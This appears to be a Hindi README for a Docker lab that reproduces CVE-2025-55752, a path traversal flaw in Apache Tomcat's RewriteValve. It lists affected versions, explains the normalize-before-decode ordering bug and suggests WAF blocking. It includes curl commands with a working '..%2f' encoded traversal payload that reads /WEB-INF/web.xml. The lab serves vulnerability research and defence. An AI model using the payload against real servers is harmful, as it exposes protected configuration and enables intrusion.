
# CVE-2025-55752 के लिए Docker-आधारित प्रजनन वातावरण Apache Tomcat के RewriteValve में पाथ ट्रैवर्सल भेद्यता, जो डिकोड-से-पहले-नॉर्मलाइज़ (normalize-before-decode) दोष को प्रदर्शित करती है और परीक्षण कमांड प्रदान करती है।
CVE-2025-55752 के लिए Docker-आधारित पुनरुत्पादन वातावरण, जो Apache Tomcat 10.1.44 में एक पाथ ट्रैवर्सल भेद्यता है।
CVE-2025-55752 Apache Tomcat के RewriteValve में एक पाथ ट्रैवर्सल भेद्यता है जो गलत प्रोसेसिंग क्रम के कारण होती है: URL नॉर्मलाइज़ेशन URL डिकोडिंग से पहले होता है। यह हमलावरों को URL-एन्कोडेड पाथ ट्रैवर्सल अनुक्रमों (..%2f) का उपयोग करके /WEB-INF/ जैसी निर्देशिकाओं की सुरक्षा बाधाओं को बायपास करने की अनुमति देता है।
| श्रृंखला | भेद्य संस्करण | पैच किया गया संस्करण |
|---|
| 11.x | 11.0.0-M1 से 11.0.10 | 11.0.11+ |
| 10.1.x | 10.1.0-M1 से 10.1.44 | 10.1.45+ |
| 9.0.x | 9.0.0-M11 से 9.0.108 | 9.0.109+ |
| 8.5.x | 8.5.6 से 8.5.100 | EOL - कोई पैच नहीं |
git clone https://github.com/masahiro331/CVE-2025-55752.git
cd CVE-2025-55752
docker-compose up -d
curl http://localhost:8080/
curl -I 'http://localhost:8080/WEB-INF/web.xml'
अपेक्षित: 403 Forbidden
curl -s 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml' | head -5
curl -I 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml'
अपेक्षित: 200 OK + web.xml सामग्री (भेद्यता की पुष्टि)
/download?path=..%2fWEB-INF%2fweb.xml/files/..%2fWEB-INF%2fweb.xml%2f को / के रूप में मान्यता नहीं दी गई, .. बच जाता है%2f → / → /files/../WEB-INF/web.xml/WEB-INF/web.xmlसही: डिकोड → नॉर्मलाइज़ → सुरक्षा जाँच
भेद्य: नॉर्मलाइज़ → डिकोड → सुरक्षा जाँच ✗
../ और %2e%2e को ब्लॉक करने के लिए WAF नियम⚠️ चेतावनी: उत्पादन में तैनात न करें। केवल पृथक परीक्षण वातावरण में उपयोग करें।